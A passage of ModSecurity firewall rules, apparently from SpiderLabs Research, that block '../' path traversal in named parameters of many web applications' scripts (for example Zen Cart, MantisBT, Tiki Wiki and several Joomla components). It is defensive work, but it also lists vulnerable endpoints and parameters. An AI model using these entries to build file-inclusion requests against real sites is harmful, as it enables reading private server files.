" "chain" SecRule ARGS:folder_level "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /section.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011828,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Module "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011829) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1) SecRule REQUEST_LINE "@contains /classes/flash_mp3_player/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011829,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1)',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2) SecRule REQUEST_LINE "@contains /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011830,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /baconmap/admin/updatelist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011843,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:filepath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011846,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains uniqcode=KPI" "chain" SecRule REQUEST_LINE "@contains menu_no_top=performance" "chain" SecRule ARGS:uri "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /news/search.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011853,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,44370'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:bn/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011882,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:owa_action "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011883) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011883,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:owa_do "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011884) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/loadplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011884,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:load "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011936) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dolphin BxDolGzip.php file Disclosure Attempt SecRule REQUEST_LINE "@contains /classes/BxDolGzip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011936,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dolphin BxDolGzip.php file Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dolphin BxDolGzip.php file Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/thumbnailformpost.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011928,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adminlangfile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011941,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains module=osTicket" "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/templateie/lib/templateie_install.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012008,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/initsystem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012010,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:loader_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012012) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Uploader download_launch.php Remote File Disclosure Attempt SecRule REQUEST_LINE "@contains /api/download_launch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012012,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS The Uploader download_launch.php Remote File Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:filename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Uploader download_launch.php Remote File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012014,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jimtawl" "chain" SecRule ARGS:task "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012022,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_cbe" "chain" SecRule REQUEST_LINE "@contains task=userProfile" "chain" SecRule ARGS:tabname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012025,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains filesec=sitemap" "chain" SecRule REQUEST_LINE "@contains filetype=text" "chain" SecRule ARGS:file "@contains ..//" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/esqueletos/skel_null.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012032,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ABTPV_BLOQUE_CENTRAL "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012033) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /modules/login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012033,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:default_login_language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012069) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /admin/upgrade_unattended.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012069,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:db_type "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt SecRule REQUEST_LINE "@contains app=urchin.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012071,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains action=prop" "chain" SecRule ARGS:gfid "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012122,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012123) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012123,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012124) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012124,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012125) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012125,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012126) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012126,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012127,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012128,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012129,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_xmovie/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012166,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /tiki-jsplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012168,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tiki Wiki CMS Groupware language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012186) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /modules/profile/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012186,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:aXconf[default_language] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS axdcms aXconf Parameter Local File Inclusion 